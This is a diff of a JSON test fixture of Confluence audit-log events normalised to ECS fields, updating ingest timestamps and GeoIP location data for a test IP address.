@@ -11132,7 +10448,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-08T15:08:08.222592135Z",
+ "ingested": "2021-12-14T14:34:31.513249964Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.055Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -11198,20 +10514,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11219,7 +10529,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.removed",
- "ingested": "2021-12-08T15:08:08.222594027Z",
+ "ingested": "2021-12-14T14:34:31.513250477Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:37.008Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -11305,20 +10615,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11326,7 +10630,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.config.updated",
- "ingested": "2021-12-08T15:08:08.222595915Z",
+ "ingested": "2021-12-14T14:34:31.513250869Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:36.900Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.spaces\",\"category\":\"Spaces\",\"actionI18nKey\":\"audit.logging.summary.space.config.updated\",\"action\":\"Space configuration updated\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"Description\",\"to\":\"\"},{\"key\":\"Home page\",\"i18nKey\":\"Home page\",\"to\":\"page: asdf v.1 (65593)\"},{\"key\":\"Name\",\"i18nKey\":\"Name\",\"to\":\"asdf\"},{\"key\":\"Space key\",\"i18nKey\":\"Space key\",\"to\":\"ASDF\"},{\"key\":\"Space status\",\"i18nKey\":\"Space status\",\"to\":\"CURRENT\"},{\"key\":\"Space type\",\"i18nKey\":\"Space type\",\"to\":\"global\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "change"
@@ -11386,20 +10690,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11407,7 +10705,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.import",
- "ingested": "2021-12-08T15:08:08.222597837Z",
+ "ingested": "2021-12-14T14:34:31.513251265Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:36.323Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.import.export\",\"category\":\"Import/Export\",\"actionI18nKey\":\"audit.logging.summary.space.import\",\"action\":\"Space import\"},\"affectedObjects\":[{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": "info",
 "kind": "event"
@@ -11476,20 +10774,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11497,7 +10789,7 @@
 },
 "event": {
 "action": "atlassian.audit.event.action.audit.search",
- "ingested": "2021-12-08T15:08:08.222599710Z",
+ "ingested": "2021-12-14T14:34:31.513251662Z",
 "original": "{\"timestamp\":\"2021-11-23T00:39:11.067Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"52 - 61\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:39:11.057109Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.299Z - 2021-11-23T00:38:58.965Z\"}]}",
 "type": "info",
 "kind": "event"
@@ -11566,20 +10858,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11587,7 +10873,7 @@
 },
 "event": {
 "action": "atlassian.audit.event.action.audit.search",
- "ingested": "2021-12-08T15:08:08.222601597Z",
+ "ingested": "2021-12-14T14:34:31.513252107Z",
 "original": "{\"timestamp\":\"2021-11-23T00:38:58.965Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"60 - 60\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:58.959089Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"1\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:38:57.393Z - 2021-11-23T00:38:57.393Z\"}]}",
 "type": "info",
 "kind": "event"
@@ -11656,20 +10942,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11677,7 +10957,7 @@
 },
 "event": {
 "action": "atlassian.audit.event.action.audit.search",
- "ingested": "2021-12-08T15:08:08.222603595Z",
+ "ingested": "2021-12-14T14:34:31.513252495Z",
 "original": "{\"timestamp\":\"2021-11-23T00:38:57.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 59\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:57.380777Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"11\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:42.240Z\"}]}",
 "type": "info",
 "kind": "event"
@@ -11746,20 +11026,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11767,7 +11041,7 @@
 },
 "event": {
 "action": "atlassian.audit.event.action.audit.search",
- "ingested": "2021-12-08T15:08:08.222605479Z",
+ "ingested": "2021-12-14T14:34:31.513252989Z",
 "original": "{\"timestamp\":\"2021-11-23T00:38:42.240Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 58\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:42.224135Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:35.211Z\"}]}",
 "type": "info",
 "kind": "event"
@@ -11836,20 +11110,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -11857,7 +11125,7 @@
 },
 "event": {
 "action": "atlassian.audit.event.action.audit.search",
- "ingested": "2021-12-08T15:08:08.222607376Z",
+ "ingested": "2021-12-14T14:34:31.513253495Z",
 "original": "{\"timestamp\":\"2021-11-23T00:38:35.211Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:35.065543Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:35:04.387Z\"}]}",
 "type": "info",
 "kind": "event"
@@ -11872,6 +11140,7 @@
 ]
 },
 {
+ "@timestamp": "2021-11-23T00:35:04.387Z",
 "confluence": {
 "audit": {
 "method": "System",
@@ -11890,7 +11159,6 @@
 ]
 }
 },
- "@timestamp": "2021-11-23T00:35:04.387Z",
 "ecs": {
 "version": "1.12.0"
 },
@@ -11904,7 +11172,7 @@
 },
 "event": {
 "action": "atlassian.audit.event.action.audit.config.updated",
- "ingested": "2021-12-08T15:08:08.222609252Z",
+ "ingested": "2021-12-14T14:34:31.513253970Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.387Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Retention\",\"i18nKey\":\"atlassian.audit.event.change.retention\",\"to\":\"3 Years\"}],\"system\":\"http://confluence.internal:8090\",\"method\":\"System\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -11984,20 +11252,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12005,7 +11267,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222611108Z",
+ "ingested": "2021-12-14T14:34:31.513254416Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.306Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12086,20 +11348,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12107,7 +11363,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222613004Z",
+ "ingested": "2021-12-14T14:34:31.513254897Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.305Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12181,20 +11437,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12202,7 +11452,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222614876Z",
+ "ingested": "2021-12-14T14:34:31.513255278Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.303Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12283,20 +11533,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12304,7 +11548,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222616758Z",
+ "ingested": "2021-12-14T14:34:31.513255663Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.301Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12385,20 +11629,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12406,7 +11644,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222618643Z",
+ "ingested": "2021-12-14T14:34:31.513256070Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.299Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12480,20 +11718,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12501,7 +11733,7 @@
 },
 "event": {
 "action": "audit.logging.summary.space.permission.added",
- "ingested": "2021-12-08T15:08:08.222620503Z",
+ "ingested": "2021-12-14T14:34:31.513256458Z",
 "original": "{\"timestamp\":\"2021-11-23T00:35:04.298Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}",
 "type": [
 "admin",
@@ -12582,20 +11814,14 @@
 "source": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.143",
@@ -12603,7 +11829,7 @@
 },
